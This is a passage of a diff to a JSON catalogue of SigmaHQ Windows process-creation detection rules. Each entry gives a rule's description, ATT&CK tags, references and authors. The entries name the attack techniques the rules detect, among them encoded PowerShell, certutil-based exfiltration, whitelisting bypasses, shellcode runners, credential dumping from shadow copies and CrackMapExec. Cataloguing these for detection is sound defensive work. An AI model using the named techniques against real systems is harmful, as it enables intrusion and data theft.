"creation_date": "2021/07/13", + "filename": "proc_creation_win_susp_athremotefxvgpudisablementcommand.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects base64 encoded powershell 'Invoke-' call", + "uuid": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "value": "Suspicious Base64 Encoded Powershell Invoke", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2022/05/20", + "filename": "proc_creation_win_susp_base64_invoke.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", + "uuid": "9c0295ce-d60d-40bd-bd74-84673b7592b1", + "value": "Suspicious Encoded Obfuscated LOAD String", + "meta": { + "refs": [ + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2022/03/01", + "filename": "proc_creation_win_susp_base64_load.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects, 
possibly, malicious unauthorized usage of bcdedit.exe", + "uuid": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "value": "Possible Ransomware or Unauthorized MBR Modifications", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", + "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bcdedit.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.persistence", + "attack.t1542.003" + ], + "creation_date": "2019/02/07", + "filename": "proc_creation_win_susp_bcdedit.yml", + "author": "@neu5ron", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "uuid": "aaf46cdc-934e-4284-b329-34aa701e3771", + "value": "Application Whitelisting Bypass via Bginfo", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", + "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_susp_bginfo.yml", + "author": "Beyu Denis, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects transferring files from system on a server bitstransfer Powershell cmdlets", + "uuid": "cd5c8085-4070-4e22-908d-a5b3342deb74", + "value": "Suspicious Bitstransfer via PowerShell", + "meta": { + "refs": [ + 
"https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bitstransfer.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.persistence", + "attack.t1197" + ], + "creation_date": "2021/08/19", + "filename": "proc_creation_win_susp_bitstransfer.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of a set of builtin commands often used in recon stages by different attack groups", + "uuid": "2887e914-ce96-435f-8105-593937e90757", + "value": "Reconnaissance Activity Using BuiltIn Commands", + "meta": { + "refs": [ + "https://twitter.com/haroonmeer/status/939099379834658817", + "https://twitter.com/c_APT_ure/status/939475433711722497", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" + ], + "creation_date": "2018/08/22", + "filename": "proc_creation_win_susp_builtin_commands_recon.yml", + "author": "Florian Roth, Markus Neis", + "level": "medium", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "uuid": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "value": "Suspicious Calculator Usage", + "meta": { + "refs": [ + 
"https://twitter.com/ItsReallyNick/status/1094080242686312448", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_calc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2019/02/09", + "filename": "proc_creation_win_susp_calc.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Launch 64-bit shellcode from a debugger script file using cdb.exe.", + "uuid": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "value": "Possible App Whitelisting Bypass via WinDbg/CDB as a Shellcode Runner", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", + "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", + "https://twitter.com/nas_bench/status/1534957360032120833", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cdb.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1218", + "attack.t1127" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_susp_cdb.yml", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of debugging tools" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code", + "uuid": "e011a729-98a6-4139-b5c4-bf6f6dd8239a", + "value": "Suspicious Certutil Command Usage", + "meta": { + "refs": [ + "https://twitter.com/JohnLaTwC/status/835149808817991680", + "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/", + 
"https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/", + "https://twitter.com/egre55/status/1087685529016193025", + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.command_and_control", + "attack.t1105", + "attack.s0160", + "attack.g0007", + "attack.g0010", + "attack.g0045", + "attack.g0049", + "attack.g0075", + "attack.g0096" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_certutil_command.yml", + "author": "Florian Roth, juju4, keepwatch", + "level": "high", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration", + "uuid": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", + "value": "Certutil Encode", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2019/02/24", + "filename": "proc_creation_win_susp_certutil_encode.yml", + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or 
otherwise obfuscating its contents on the system or in transit.",
+ "uuid": "e0552b19-5a83-4222-b141-b36184bb8d79",
+ "value": "Obfuscated Command Line Using Special Unicode Characters",
+ "meta": {
+ "refs": [
+ "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027"
+ ],
+ "creation_date": "2022/01/15",
+ "filename": "proc_creation_win_susp_char_in_cmd.yml",
+ "author": "frack113",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts",
+ "uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d",
+ "value": "Suspicious Child Process Created as System",
+ "meta": {
+ "refs": [
+ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
+ "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
+ "https://github.com/antonioCoco/RogueWinRM",
+ "https://twitter.com/Cyb3rWard0g/status/1453123054243024897",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1134.002"
+ ],
+ "creation_date": "2019/10/26",
+ "filename": "proc_creation_win_susp_child_process_as_system_.yml",
+ "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": 
"process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", + "uuid": "4b046706-5789-4673-b111-66f25fe99534", + "value": "Overwrite Deleted Data with Cipher", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cipher.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2021/12/26", + "filename": "proc_creation_win_susp_cipher.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process that use escape characters", + "uuid": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", + "value": "Suspicious Commandline Escape", + "meta": { + "refs": [ + "https://twitter.com/vysecurity/status/885545634958385153", + "https://twitter.com/Hexacorn/status/885553465417756673", + "https://twitter.com/Hexacorn/status/885570278637678592", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ], + "creation_date": "2018/12/11", + "filename": "proc_creation_win_susp_cli_escape.yml", + "author": "juju4", + 
"level": "low", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of a CLSID folder name located in a suspicious location from the commandline as seen being used in IcedID", + "uuid": "90b63c33-2b97-4631-a011-ceb0f47b77c3", + "value": "Suspicious CLSID Folder Name In Suspicious Locations", + "meta": { + "refs": [ + "https://twitter.com/Kostastsale/status/1565257924204986369", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_clsid_foldername.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2022/09/01", + "filename": "proc_creation_win_susp_clsid_foldername.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Some FP is expected with some installers" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "uuid": "178e615d-e666-498b-9630-9ed363038101", + "value": "Suspicious Elevated System Shell", + "meta": { + "refs": [ + "https://github.com/Wh04m1001/SysmonEoP", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/12/05", + "filename": "proc_creation_win_susp_cmd.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. 
This could be indicative of adversary lateral movement.",
+ "uuid": "e31f89f7-36fb-4697-8ab6-48823708353b",
+ "value": "Suspicious Cmd Execution via WMI",
+ "meta": {
+ "refs": [
+ "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_exectution_via_wmi.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047"
+ ],
+ "creation_date": "2022/09/27",
+ "filename": "proc_creation_win_susp_cmd_exectution_via_wmi.yml",
+ "author": "Tim Rauch",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)",
+ "uuid": "1ac8666b-046f-4201-8aba-1951aaec03a3",
+ "value": "Command Line Execution with Suspicious URL and AppData Strings",
+ "meta": {
+ "refs": [
+ "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100",
+ "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.003",
+ "attack.t1059.001",
+ "attack.command_and_control",
+ "attack.t1105"
+ ],
+ "creation_date": "2019/01/16",
+ "filename": "proc_creation_win_susp_cmd_http_appdata.yml",
+ "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community",
+ "level": "medium",
+ "falsepositive": [
+ "High"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a copy execution that targets a shadow copy (sometimes used to copy registry hives 
that are in use)",
+ "uuid": "c73124a7-3e89-44a3-bdc1-25fe4df754b1",
+ "value": "Copy from Volume Shadow Copy",
+ "meta": {
+ "refs": [
+ "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
+ "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
+ "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml"
+ ],
+ "tags": [
+ "attack.impact",
+ "attack.t1490"
+ ],
+ "creation_date": "2021/08/09",
+ "filename": "proc_creation_win_susp_cmd_shadowcopy_access.yml",
+ "author": "Max Altgelt, Tobias Michalski",
+ "level": "medium",
+ "falsepositive": [
+ "Some rare backup scenarios"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects use of chcp to look up the system locale value as part of host discovery",
+ "uuid": "7090adee-82e2-4269-bd59-80691e7c6338",
+ "value": "CHCP CodePage Locale Lookup",
+ "meta": {
+ "refs": [
+ "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1614.001"
+ ],
+ "creation_date": "2022/02/21",
+ "filename": "proc_creation_win_susp_codepage_lookup.yml",
+ "author": "_pete_0, TheDFIRReport",
+ "level": "high",
+ "falsepositive": [
+ "During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a code page switch in command line or batch scripts to a rare language",
+ "uuid": 
"c7942406-33dd-4377-a564-0f62db0593a3", + "value": "Suspicious Code Page Switch", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", + "https://twitter.com/cglyer/status/1183756892952248325", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_codepage_switch.yml" + ], + "tags": [ + "attack.t1036", + "attack.defense_evasion" + ], + "creation_date": "2019/10/14", + "filename": "proc_creation_win_susp_codepage_switch.yml", + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "level": "medium", + "falsepositive": [ + "Administrative activity (adjust code pages according to your organisation's region)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Unicode characters in the command line, which could be a sign of obfuscation or defense evasion", + "uuid": "2c0d2d7b-30d6-4d14-9751-7b9113042ab9", + "value": "Suspicious Characters in CommandLine", + "meta": { + "refs": [ + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_chars.yml" + ], + "tags": "No established tags", + "creation_date": "2022/04/27", + "filename": "proc_creation_win_susp_commandline_chars.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. 
seen in PsExec-like tools",
+ "uuid": "50d66fb0-03f8-4da0-8add-84e77d12a020",
+ "value": "Suspicious RunAs-Like Flag Combination",
+ "meta": {
+ "refs": [
+ "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml"
+ ],
+ "tags": "No established tags",
+ "creation_date": "2022/11/11",
+ "filename": "proc_creation_win_susp_command_flag_pattern.yml",
+ "author": "Florian Roth",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious command line arguments of common data compression tools",
+ "uuid": "27a72a60-7e5e-47b1-9d17-909c9abafdcd",
+ "value": "Suspicious Compression Tool Parameters",
+ "meta": {
+ "refs": [
+ "https://twitter.com/SBousseaden/status/1184067445612535811",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml"
+ ],
+ "tags": [
+ "attack.collection",
+ "attack.t1560.001"
+ ],
+ "creation_date": "2019/10/15",
+ "filename": "proc_creation_win_susp_compression_params.yml",
+ "author": "Florian Roth, Samir Bousseaden",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the conhost execution as parent process. 
Can be used to evaded defense mechanism.",
+ "uuid": "7dc2dedd-7603-461a-bc13-15803d132355",
+ "value": "Conhost Parent Process Executions",
+ "meta": {
+ "refs": [
+ "http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1202"
+ ],
+ "creation_date": "2020/10/25",
+ "filename": "proc_creation_win_susp_conhost.yml",
+ "author": "omkar72",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application",
+ "uuid": "3037d961-21e9-4732-b27a-637bcc7bf539",
+ "value": "Suspicious Conhost Legacy Option",
+ "meta": {
+ "refs": [
+ "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29",
+ "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_conhost_option.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1202"
+ ],
+ "creation_date": "2022/04/04",
+ "filename": "proc_creation_win_susp_conhost_option.yml",
+ "author": "frack113",
+ "level": "informational",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_creation",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a suspicious process pattern found in CVE-2021-40444 exploitation",
+ "uuid": "894397c6-da03-425c-a589-3d09e7d1f750",
+ "value": "CVE-2021-40444 Process Pattern",
+ "meta": {
+ "refs": [
+ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444",
+ "https://twitter.com/neonprimetime/status/1435584010202255375",
+ "https://www.joesandbox.com/analysis/476188/1/iochtml",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_cve_2021_40444.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2021/09/08", + "filename": "proc_creation_win_susp_control_cve_2021_40444.yml", + "author": "@neonprimetime, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", + "uuid": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", + "value": "Suspicious Control Panel DLL Load", + "meta": { + "refs": [ + "https://twitter.com/rikvduijn/status/853251879320662017", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_control_dll_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2017/04/15", + "filename": "proc_creation_win_susp_control_dll_load.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "uuid": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", + "value": "Copy from Admin Share", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1211636381086339073", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.collection", 
+ "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" + ], + "creation_date": "2019/12/30", + "filename": "proc_creation_win_susp_copy_lateral_movement.yml", + "author": "Florian Roth, oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Administrative scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", + "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "value": "Suspicious Copy From or To System32", + "meta": { + "refs": [ + "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ], + "creation_date": "2020/07/03", + "filename": "proc_creation_win_susp_copy_system32.yml", + "author": "Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update)", + "level": "medium", + "falsepositive": [ + "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" + ], + "logsource.category": 
"process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command lines used in Covenant luanchers", + "uuid": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "value": "Covenant Launcher Indicators", + "meta": { + "refs": [ + "https://posts.specterops.io/covenant-v0-5-eee0507b85ba", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_covenant.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1564.003" + ], + "creation_date": "2020/06/04", + "filename": "proc_creation_win_susp_covenant.yml", + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "level": "high", + "falsepositive": "No established falsepositives", + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect various execution methods of the CrackMapExec pentesting framework", + "uuid": "058f4380-962d-40a5-afce-50207d36d7e2", + "value": "CrackMapExec Command Execution", + "meta": { + "refs": [ + "https://github.com/byt3bl33d3r/CrackMapExec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" + ], + "creation_date": "2020/05/22", + "filename": "proc_creation_win_susp_crackmapexec_execution.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "uuid": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "value": "CrackMapExec Command Line Flags", + "meta": { + "refs": [ + 
"https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local", + "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz", + "https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_flags.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/25", + "filename": "proc_creation_win_susp_crackmapexec_flags.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "uuid": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "value": "CrackMapExec PowerShell Obfuscation", + "meta": { + "refs": [ + "https://github.com/byt3bl33d3r/CrackMapExec", + "https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" + ], + "creation_date": "2020/05/22", + "filename": 